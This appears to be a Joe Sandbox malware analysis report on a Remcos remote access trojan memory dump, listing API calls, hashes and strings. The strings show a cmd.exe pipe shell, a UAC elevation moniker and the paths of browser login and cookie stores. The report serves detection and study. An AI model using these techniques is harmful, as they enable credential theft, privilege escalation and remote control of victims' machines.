                                                          • Opcode ID: 77576b226d5d7e688e65b73d498af111b7cb5fb539c5089e9790c2b3602f880a
                                                          • Instruction ID: b295cc1738544ab29805b0169c57b094a9c978f749b2cf5192cc4ec57f55827b
                                                          • Opcode Fuzzy Hash: 77576b226d5d7e688e65b73d498af111b7cb5fb539c5089e9790c2b3602f880a
                                                          • Instruction Fuzzy Hash: EDD0133255950C8FD5117574590F8A4775CC717515F0047565CB5835C7E644171CC2B7
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: send
                                                          • String ID:
                                                          • API String ID: 2809346765-0
                                                          • Opcode ID: 6930901c65e14d36ea46bb8722dbe44ec967b08f0cc130a0c53aa02e2fc3d49b
                                                          • Instruction ID: f1a70bc0129cd5dc47069aa993d9eb306165b87225fdedcc2fed9ff31893d402
                                                          • Opcode Fuzzy Hash: 6930901c65e14d36ea46bb8722dbe44ec967b08f0cc130a0c53aa02e2fc3d49b
                                                          • Instruction Fuzzy Hash: 01B09B75104205FF9F051760C8048AA7D669BC83C0F008D0C758741130C53284509731
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID:
                                                          • API String ID: 1507349165-0
                                                          • Opcode ID: 56ea60db45ac78fdf984b62d20ba01fe3bd51aa4315f902c602c10484aaba625
                                                          • Instruction ID: 7b4c6f11b195ee6a1e91967c9284f7216ef5f2958c824c2f5252520581b28aa2
                                                          • Opcode Fuzzy Hash: 56ea60db45ac78fdf984b62d20ba01fe3bd51aa4315f902c602c10484aaba625
                                                          • Instruction Fuzzy Hash: 8EB0927A208206FF9E061B60C804C6ABEA6AFC83C1B00CC0CBA8640130D67384609B22
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 02F956E6
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          • __Init_thread_footer.LIBCMT ref: 02F95723
                                                          • CreatePipe.KERNEL32(03006CCC,03006CB4,03006BD8,00000000,02FF60CC,00000000), ref: 02F957B6
                                                          • CreatePipe.KERNEL32(03006CB8,03006CD4,03006BD8,00000000), ref: 02F957CC
                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,03006BE8,03006CBC), ref: 02F9583F
                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 02F95897
                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02F958BC
                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 02F958E9
                                                            • Part of subcall function 02FC4801: __onexit.LIBCMT ref: 02FC4807
                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,03004F90,02FF60D0,00000062,02FF60B4), ref: 02F959E4
                                                          • Sleep.KERNEL32(00000064,00000062,02FF60B4), ref: 02F959FE
                                                          • TerminateProcess.KERNEL32(00000000), ref: 02F95A17
                                                          • CloseHandle.KERNEL32 ref: 02F95A23
                                                          • CloseHandle.KERNEL32 ref: 02F95A2B
                                                          • CloseHandle.KERNEL32 ref: 02F95A3D
                                                          • CloseHandle.KERNEL32 ref: 02F95A45
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                          • String ID: SystemDrive$cmd.exe
                                                          • API String ID: 2994406822-3633465311
                                                          • Opcode ID: 087d9cb8e6115152b3a14d1a650267897b64e1da1c1108adbdd825671133cf45
                                                          • Instruction ID: 3176e3e4ee7514df04fac543d82682c6fc22dc6fcf9cb60a72e5672b18ab9dc9
                                                          • Opcode Fuzzy Hash: 087d9cb8e6115152b3a14d1a650267897b64e1da1c1108adbdd825671133cf45
                                                          • Instruction Fuzzy Hash: 45919171A0620DAFFF01FB24EC50E3A7A9BEB44788F40042DFB4696295DF6698158B61
                                                          APIs
                                                          • GetCurrentProcessId.KERNEL32 ref: 02FA2141
                                                            • Part of subcall function 02FA38B2: RegCreateKeyA.ADVAPI32(80000001,00000000,02FF60B4), ref: 02FA38C0
                                                            • Part of subcall function 02FA38B2: RegSetValueExA.KERNEL32(02FF60B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,02F9C18D,02FF6C58,00000001,000000AF,02FF60B4), ref: 02FA38DB
                                                            • Part of subcall function 02FA38B2: RegCloseKey.ADVAPI32(02FF60B4,?,?,?,02F9C18D,02FF6C58,00000001,000000AF,02FF60B4), ref: 02FA38E6
                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 02FA2181
                                                          • CloseHandle.KERNEL32(00000000), ref: 02FA2190
                                                          • CreateThread.KERNEL32(00000000,00000000,02FA2829,00000000,00000000,00000000), ref: 02FA21E6
                                                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 02FA2455
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                          • API String ID: 3018269243-13974260
                                                          • Opcode ID: d611b42e7aa03f591de6f682371a24d31d64e0940eeb365583d2f3fdfb12aaca
                                                          • Instruction ID: 0875c1c5b4964050026a55d64e107580bc00b164e842ca732b5326ef53bac7f1
                                                          • Opcode Fuzzy Hash: d611b42e7aa03f591de6f682371a24d31d64e0940eeb365583d2f3fdfb12aaca
                                                          • Instruction Fuzzy Hash: A071B6716042056BFA14F770DC6596FB7A6AF917C4F40092DFB46531A0FF609909CEA2
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 02F9BBEA
                                                          • FindClose.KERNEL32(00000000), ref: 02F9BC04
                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 02F9BD27
                                                          • FindClose.KERNEL32(00000000), ref: 02F9BD4D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                          • API String ID: 1164774033-3681987949
                                                          • Opcode ID: 33bb737552986ab18f9c71aba505b86f31be6ffbf01f50bee1b3c8b7b6a50161
                                                          • Instruction ID: 8c1c5df2b8c8493e5329b63a8ca8412f4c50b08c7ecb3225616b935da3cacdad
                                                          • Opcode Fuzzy Hash: 33bb737552986ab18f9c71aba505b86f31be6ffbf01f50bee1b3c8b7b6a50161
                                                          • Instruction Fuzzy Hash: 43514F31D0010E9AFF14FBB5DC54EEEB73AAF10784F50056AE70AA60A0EF605A49CE91
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 02FA68FD
                                                          • EmptyClipboard.USER32 ref: 02FA690B
                                                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 02FA692B
                                                          • GlobalLock.KERNEL32(00000000), ref: 02FA6934
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 02FA696A
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 02FA6973
                                                          • CloseClipboard.USER32 ref: 02FA6990
                                                          • OpenClipboard.USER32 ref: 02FA6997
                                                          • GetClipboardData.USER32(0000000D), ref: 02FA69A7
                                                          • GlobalLock.KERNEL32(00000000), ref: 02FA69B0
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 02FA69B9
                                                          • CloseClipboard.USER32 ref: 02FA69BF
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                          • String ID:
                                                          • API String ID: 3520204547-0
                                                          • Opcode ID: cfe36589132c61e1582ba16d7a3b1f13becb4e66721049b79b6b85986a96bde2
                                                          • Instruction ID: 83f6c44d14817ab3ef26f26da3226c6886e76cbdfe554a6dc36d689a47163790
                                                          • Opcode Fuzzy Hash: cfe36589132c61e1582ba16d7a3b1f13becb4e66721049b79b6b85986a96bde2
                                                          • Instruction Fuzzy Hash: 84213671A44205DFEF15BBB0DC5CAAFB6AEAF947C1F40082DF646861C0EF7448158A72
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,030050E4,?,03005338), ref: 02F9F4C9
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,03005338), ref: 02F9F4F4
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 02F9F510
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 02F9F58F
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,03005338), ref: 02F9F59E
                                                            • Part of subcall function 02FAC26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 02FAC286
                                                            • Part of subcall function 02FAC26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 02FAC299
                                                          • CloseHandle.KERNEL32(00000000,?,03005338), ref: 02F9F6A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                          • API String ID: 3756808967-1743721670
                                                          • Opcode ID: fe1e3162dbac7c8db968e7ebab700794c2630db35e5c02b1fb723459454c939f
                                                          • Instruction ID: cc128d83ca2acdd01d9ab77d4f3dad36d1f2411cf0e7c73c1c1cf58618d25021
                                                          • Opcode Fuzzy Hash: fe1e3162dbac7c8db968e7ebab700794c2630db35e5c02b1fb723459454c939f
                                                          • Instruction Fuzzy Hash: B4712D715083459AEF64FB20DC50AAFB7A6AF913C4F40092DE78A831A1EF31994DCF52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0$1$2$3$4$5$6$7
                                                          • API String ID: 0-3177665633
                                                          • Opcode ID: 0881422d185cea3ef85e6a0e0c348f1c88f67b51c1393837b8e09a30f5bd3818
                                                          • Instruction ID: 0c06cff18eeb3255a8035e6061cff1329b5c3428308dc6ec3e53231203c71dad
                                                          • Opcode Fuzzy Hash: 0881422d185cea3ef85e6a0e0c348f1c88f67b51c1393837b8e09a30f5bd3818
                                                          • Instruction Fuzzy Hash: C0717FB05083119FEB16EF20DC60FAA7BD5AF85790F80491DE692571D0DAB4AA4CCF92
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 02F9755C
                                                          • CoGetObject.OLE32(?,00000024,02FF6528,00000000), ref: 02F975BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Object_wcslen
                                                          • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                          • API String ID: 240030777-3166923314
                                                          • Opcode ID: 2e513bb568da54714ef0b910b306409f62053d997fdc2dec3dbeb7f0731a4e59
                                                          • Instruction ID: 0936c19c91d1681b8ce3f2e69365bc70aab85601ecb6b7b64f4d68572164ac45
                                                          • Opcode Fuzzy Hash: 2e513bb568da54714ef0b910b306409f62053d997fdc2dec3dbeb7f0731a4e59
                                                          • Instruction Fuzzy Hash: CC11A3B2910208ABFB50FAA4CC44EDEF7BD9F04B90F14005AF715E2250EA709A048E61
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,030058E8), ref: 02FAA7EF
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02FAA83E
                                                          • GetLastError.KERNEL32 ref: 02FAA84C
                                                          • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 02FAA884
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                          • String ID:
                                                          • API String ID: 3587775597-0
                                                          • Opcode ID: cf7132ee575ca3143bc2f81bb32d38e2e9eaed16c66d7d8d73c34f06d45d3fea
                                                          • Instruction ID: 6dc15b075b881ae6f8c3cb724f5dd084ab8fc98c3f3a0c213bc2f1836dbb192f
                                                          • Opcode Fuzzy Hash: cf7132ee575ca3143bc2f81bb32d38e2e9eaed16c66d7d8d73c34f06d45d3fea
                                                          • Instruction Fuzzy Hash: C1817D71508305ABEB14EB60DC94EAFB7E9BF94784F50082DF68642150EF70EA09CF92
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 02F9C3D6
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 02F9C4A9
                                                          • FindClose.KERNEL32(00000000), ref: 02F9C4B8
                                                          • FindClose.KERNEL32(00000000), ref: 02F9C4E3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                          • API String ID: 1164774033-405221262
                                                          • Opcode ID: 58a1999abf917d713b9791d79485e90411f47873447f8d48abeb338cb6738dc9
                                                          • Instruction ID: 8c0d3d54528ac69db7f3768604ea1cbb37c4fb4c68f39a30e089d60049968b09
                                                          • Opcode Fuzzy Hash: 58a1999abf917d713b9791d79485e90411f47873447f8d48abeb338cb6738dc9
                                                          • Instruction Fuzzy Hash: 3D318031A0021E9AFF15F764DC54AFEB77EAF107D4F00016AE30AA60A0EF609986CE54
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC37D
                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC3AD
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC41F
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC42C
                                                            • Part of subcall function 02FAC322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC402
                                                          • GetLastError.KERNEL32(?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC44D
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC463
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC46A
                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,030052D8,030052F0,00000001), ref: 02FAC473
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                          • String ID:
                                                          • API String ID: 2341273852-0
                                                          • Opcode ID: 09c62e2744cca5fed3ccdff59be150eb4477bf796fa43591a99f627da747aade
                                                          • Instruction ID: d2e991329c5afffcc3cb8fa1af79568ebf0c5452a77f3b07d7981a94bff1fa62
                                                          • Opcode Fuzzy Hash: 09c62e2744cca5fed3ccdff59be150eb4477bf796fa43591a99f627da747aade
                                                          • Instruction Fuzzy Hash: 4E3193B2C4421C9AEF20D660DD58EEAB37DAF05380F1405ABEA55E2050EF759A94CE64
                                                          APIs
                                                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02FA40D8
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 02FA40E4
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 02FA42A5
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA42AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                                          • API String ID: 2127411465-314212984
                                                          • Opcode ID: 25004fa071b81611c615c6643da8387f9f1e45e8ba989f5ce0760d48ac5e7e15
                                                          • Instruction ID: c15bb43c91381320ac52ef3c710485dc374ab49e24c5d51a64ca8786e8fcef7e
                                                          • Opcode Fuzzy Hash: 25004fa071b81611c615c6643da8387f9f1e45e8ba989f5ce0760d48ac5e7e15
                                                          • Instruction Fuzzy Hash: 7FB10872E0830166EE14FB74DC659AF76AA5F917C0F40052CFB17971E0EEA59A08CF92
                                                          APIs
                                                          • _free.LIBCMT ref: 02FD9292
                                                          • _free.LIBCMT ref: 02FD92B6
                                                          • _free.LIBCMT ref: 02FD943D
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,02FEF244), ref: 02FD944F
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,03002764,000000FF,00000000,0000003F,00000000,?,?), ref: 02FD94C7
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,030027B8,000000FF,?,0000003F,00000000,?), ref: 02FD94F4
                                                          • _free.LIBCMT ref: 02FD9609
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                          • String ID:
                                                          • API String ID: 314583886-0
                                                          • Opcode ID: e08f4724dd74726d4a22a3ae4eec4a1b699825ae6b7e9e00e910426c71354050
                                                          • Instruction ID: bb64de2f47d77d826a2ec8f57d7bf6b53e7cb927dec76ac23f8d540a5030c3f4
                                                          • Opcode Fuzzy Hash: e08f4724dd74726d4a22a3ae4eec4a1b699825ae6b7e9e00e910426c71354050
                                                          • Instruction Fuzzy Hash: C4C11671E00205ABDB20AFF8DC40BAABBBFEF453D4F1C459AD69597280D7B19942CB50
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 02F9BA89
                                                          • GetLastError.KERNEL32 ref: 02F9BA93
                                                          Strings
                                                          • [Chrome StoredLogins not found], xrefs: 02F9BAAD
                                                          • UserProfile, xrefs: 02F9BA59
                                                          • [Chrome StoredLogins found, cleared!], xrefs: 02F9BAB9
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 02F9BA54
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                          • API String ID: 2018770650-1062637481
                                                          • Opcode ID: 893aadd99c775a67491325f79169b3ed38b82d1500d9c5276f8a7c36555da158
                                                          • Instruction ID: 5b91dc44b3a0e49c0c4584aa5b58c63b5f24fbf0a2ab0d866737198db4125fa6
                                                          • Opcode Fuzzy Hash: 893aadd99c775a67491325f79169b3ed38b82d1500d9c5276f8a7c36555da158
                                                          • Instruction Fuzzy Hash: 9301F931E8000A5B7F58F7B5EC269BE772AED116C8B800529DF17932A0FF518515CBD2
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 02FA799A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 02FA79A1
                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02FA79B3
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02FA79D2
                                                          • GetLastError.KERNEL32 ref: 02FA79D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 3534403312-3733053543
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02F99293
                                                            • Part of subcall function 02F948C8: connect.WS2_32(?,?,?), ref: 02F948E0
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 02F9932F
                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 02F9938D
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 02F993E5
                                                          • FindClose.KERNEL32(00000000), ref: 02F993FC
                                                            • Part of subcall function 02F94E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,03004EF8,?,00000000,03004EF8,02F94CA8,00000000,?,?,?,03004EF8,?), ref: 02F94E38
                                                            • Part of subcall function 02F94E26: SetEvent.KERNEL32(?,?,00000000,03004EF8,02F94CA8,00000000,?,?,?,03004EF8,?), ref: 02F94E43
                                                            • Part of subcall function 02F94E26: CloseHandle.KERNEL32(?,?,00000000,03004EF8,02F94CA8,00000000,?,?,?,03004EF8,?), ref: 02F94E4C
                                                          • FindClose.KERNEL32(00000000), ref: 02F995F4
                                                            • Part of subcall function 02F94AA1: WaitForSingleObject.KERNEL32(?,00000000,02F9547D,?,?,00000004,?,?,00000004,?,03004EF8,?), ref: 02F94B47
                                                            • Part of subcall function 02F94AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,03004EF8,?,?,?,?,?,?,02F9547D), ref: 02F94B75
                                                          Similarity
                                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                          • String ID:
                                                          • API String ID: 1824512719-0
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,02FAA731,00000000), ref: 02FAAAE4
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,02FAA731,00000000), ref: 02FAAAF9
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,02FAA731,00000000), ref: 02FAAB06
                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,02FAA731,00000000), ref: 02FAAB11
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,02FAA731,00000000), ref: 02FAAB23
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,02FAA731,00000000), ref: 02FAAB26
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                                          • String ID:
                                                          • API String ID: 276877138-0
                                                          APIs
                                                            • Part of subcall function 02FA798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 02FA799A
                                                            • Part of subcall function 02FA798D: OpenProcessToken.ADVAPI32(00000000), ref: 02FA79A1
                                                            • Part of subcall function 02FA798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02FA79B3
                                                            • Part of subcall function 02FA798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02FA79D2
                                                            • Part of subcall function 02FA798D: GetLastError.KERNEL32 ref: 02FA79D8
                                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 02FA6891
                                                          • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 02FA68A6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 02FA68AD
                                                          Similarity
                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                          • String ID: PowrProf.dll$SetSuspendState
                                                          • API String ID: 1589313981-1420736420
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,02FE27DB,?,00000000), ref: 02FE2555
